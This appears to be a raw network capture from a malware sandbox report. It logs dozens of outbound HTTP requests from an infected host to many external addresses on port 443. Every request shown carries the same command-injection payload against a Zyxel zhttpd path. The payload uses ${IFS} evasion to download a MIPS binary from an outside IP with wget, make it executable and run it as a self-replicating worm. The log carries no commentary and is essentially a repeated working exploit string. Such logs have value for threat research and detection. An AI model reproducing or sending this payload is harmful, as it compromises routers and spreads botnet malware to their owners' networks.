                                      Jan 19, 2024 17:29:50.133563042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8695192.168.2.1458662217.70.66.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133601904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8696192.168.2.144553873.58.159.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133636951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8697192.168.2.145593443.215.100.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133680105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8698192.168.2.1444672120.180.40.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133717060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8699192.168.2.1448628141.127.94.19443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133735895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8700192.168.2.14371404.83.179.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133785009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8701192.168.2.1435754161.204.55.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133825064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8702192.168.2.1451544134.22.153.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133871078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8703192.168.2.1456968200.48.10.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133914948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8704192.168.2.1447302123.111.157.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133929014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8705192.168.2.1444528146.17.246.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133970976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8706192.168.2.144373037.47.78.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134011030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8707192.168.2.1450634223.202.24.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134048939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8708192.168.2.144050885.104.21.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134079933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8709192.168.2.144340264.206.186.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134128094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8710192.168.2.143852877.87.62.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134155035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8711192.168.2.1456768157.160.118.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134195089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8712192.168.2.1433198205.54.82.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134239912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8713192.168.2.1440182197.29.11.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134289980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8714192.168.2.145429449.184.56.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134331942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8715192.168.2.1440840157.127.233.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134372950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8716192.168.2.144218282.92.248.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134396076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8717192.168.2.14456585.30.123.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134447098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8718192.168.2.1449356110.100.137.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134495974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8719192.168.2.1437056121.206.81.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134522915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8720192.168.2.1444124147.174.51.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134588003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8721192.168.2.145447452.18.169.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134598017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8722192.168.2.1437870111.124.52.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134644985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8723192.168.2.1439400171.219.12.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134793997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8724192.168.2.1433470177.99.244.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134800911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8725192.168.2.145790263.228.70.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134804010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8726192.168.2.145295458.236.80.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134804010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8727192.168.2.144588612.238.192.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134808064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8728192.168.2.143767442.10.231.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134818077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8729192.168.2.143898067.119.253.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134835958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8730192.168.2.1434226149.57.247.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134866953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8731192.168.2.1438268152.201.199.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134913921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8732192.168.2.1453704199.134.194.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134927034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8733192.168.2.1454330178.109.162.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.134970903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8734192.168.2.1436896184.94.27.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135023117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8735192.168.2.1434304113.71.120.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135040998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8736192.168.2.1443468131.158.83.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135101080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8737192.168.2.1434656102.250.140.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135147095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8738192.168.2.143615249.20.166.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135190010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8739192.168.2.1440966142.254.200.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135246038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8740192.168.2.1441580143.121.2.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135276079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8741192.168.2.14601484.37.136.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135314941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8742192.168.2.145642488.228.248.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135356903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8743192.168.2.144236837.2.4.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135387897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8744192.168.2.1436670196.177.108.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135417938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8745192.168.2.1450870179.1.35.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135452986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8746192.168.2.1448212208.86.247.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135495901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8747192.168.2.144504444.88.67.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135543108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8748192.168.2.14388409.68.54.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135584116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8749192.168.2.1435992115.252.161.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135613918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8750192.168.2.1443406134.251.192.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135663986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8751192.168.2.146015435.157.142.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135690928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8752192.168.2.144843663.146.33.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135719061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8753192.168.2.145564636.234.53.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135761976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8754192.168.2.1446816137.138.229.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135824919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8755192.168.2.1448802144.238.146.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135852098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8756192.168.2.145913667.112.11.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135898113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8757192.168.2.1456278122.142.243.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.135935068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8758192.168.2.1450042184.242.61.188443
                                      TimestampBytes transferredDirectionData
